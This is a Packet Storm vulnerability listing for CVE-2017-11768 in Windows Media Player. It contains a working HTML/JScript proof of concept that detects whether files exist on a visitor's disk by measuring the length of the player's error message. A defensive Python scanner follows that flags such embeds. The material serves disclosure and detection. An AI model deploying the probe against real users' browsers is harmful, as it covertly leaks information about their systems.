packetstorm | James Lee | PACKETSTORM:145549
Dec 26, 2017 - 12:00 a.m.

Windows Media Player Information Disclosure

packetstormsecurity.com

EPSS: 0.002 (Low), percentile 51.4%

https://www.facebook.com/ExploitWareLabs/posts/1647568611973673

CVE-2017-11768 PoC code:

```html
<b>existing file:</b>

<!-- The "existing file:" label in a bold tag introduces a Windows Media Player
mp3 embed that tests for the presence of files on disk; in our case we are
detecting the cmd.exe binary in the system32 folder. -->

<br>
<br>

<OBJECT id="Player" classid="CLSID:6BF52A52-394A-11d3-B153-00C04F79FAA6">

<!-- Instantiating the specific class id - Windows Media Player HTMLView CLSID
"6BF52A52-394A-11d3-B153-00C04F79FAA6" - to embed Windows Media Player. -->

<PARAM NAME="URL" VALUE="file://C://Windows//system32//cmd.exe//CONIN$.mp3">

<!-- Testing for the presence of files on disk via param.url. I added
"CONIN$.mp3" at the end of VALUE for valid detection; otherwise you'll get a
prompt that says "doesn't match the file format". CONIN$ is the console input
device, a parameter of the well-known Windows function CreateFile. CONIN$ is a
reserved name on Windows, which means it's an invalid mp3 file name and thus
bypasses the prompt that checks the extension. You can change param.url to your
desired file/folder to detect. -->

<param name="captioningID" value="displaylyric" />

<PARAM NAME="autoStart" VALUE="-1">

</OBJECT>

<SCRIPT LANGUAGE = "JScript" FOR = Player EVENT = error()>
// The error description differs between a missing and an existing path;
// in this check a length of 189 is treated as the "not found" case.
if(Player.error.item(0).errorDescription.length==189){
alert('File not detected.');
}
else{
alert('File detected!');
}
</SCRIPT>
```
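A defender-side check, added here and not part of the original PoC or advisory: a scanner that flags HTML embedding the Windows Media Player control with a `file:` URL param and reports whether an error-event script is bound to that object, the combination the PoC relies on. The class name, function name and both sample documents are constructed for illustration.

```python
from html.parser import HTMLParser

# CLSID of the Windows Media Player control, taken from the PoC on this page.
WMP_CLSID = "clsid:6bf52a52-394a-11d3-b153-00c04f79faa6"

class WmpProbeScanner(HTMLParser):
    """Collect WMP <object> embeds whose URL param is a local file: path."""
    def __init__(self):
        super().__init__()
        self.current = None       # id of the WMP <object> being parsed
        self.local_urls = []      # (object id, URL value) pairs
        self.error_hooks = set()  # object ids with an error-event <script>

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "object" and a.get("classid", "").lower() == WMP_CLSID:
            self.current = a.get("id", "").lower()
        elif tag == "param" and self.current is not None:
            value = a.get("value", "")
            if a.get("name", "").lower() == "url" and value.lower().startswith("file:"):
                self.local_urls.append((self.current, value))
        elif tag == "script" and a.get("event", "").lower().startswith("error"):
            self.error_hooks.add(a.get("for", "").lower())

    def handle_endtag(self, tag):
        if tag == "object":
            self.current = None

def scan(html):
    """Return one finding per local-path WMP embed in the given HTML."""
    s = WmpProbeScanner()
    s.feed(html)
    s.close()
    return [{"object": oid, "url": url, "error_handler": oid in s.error_hooks}
            for oid, url in s.local_urls]

# Constructed samples: one mirrors the PoC's structure, one is an ordinary embed.
SUSPICIOUS = '''<OBJECT id="Player" classid="CLSID:6BF52A52-394A-11d3-B153-00C04F79FAA6">
<PARAM NAME="URL" VALUE="file://C://Windows//system32//cmd.exe//CONIN$.mp3">
</OBJECT>
<SCRIPT LANGUAGE = "JScript" FOR = Player EVENT = error()>alert(1);</SCRIPT>'''
BENIGN = '''<object id="p" classid="CLSID:6BF52A52-394A-11d3-B153-00C04F79FAA6">
<param name="URL" value="https://media.example/track.mp3"></object>'''

if __name__ == "__main__":
    for name, doc in (("suspicious", SUSPICIOUS), ("benign", BENIGN)):
        print(name, scan(doc))
```

A finding with `error_handler` set to true is the stronger signal, since the probe only leaks information when script can read the player's error state.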
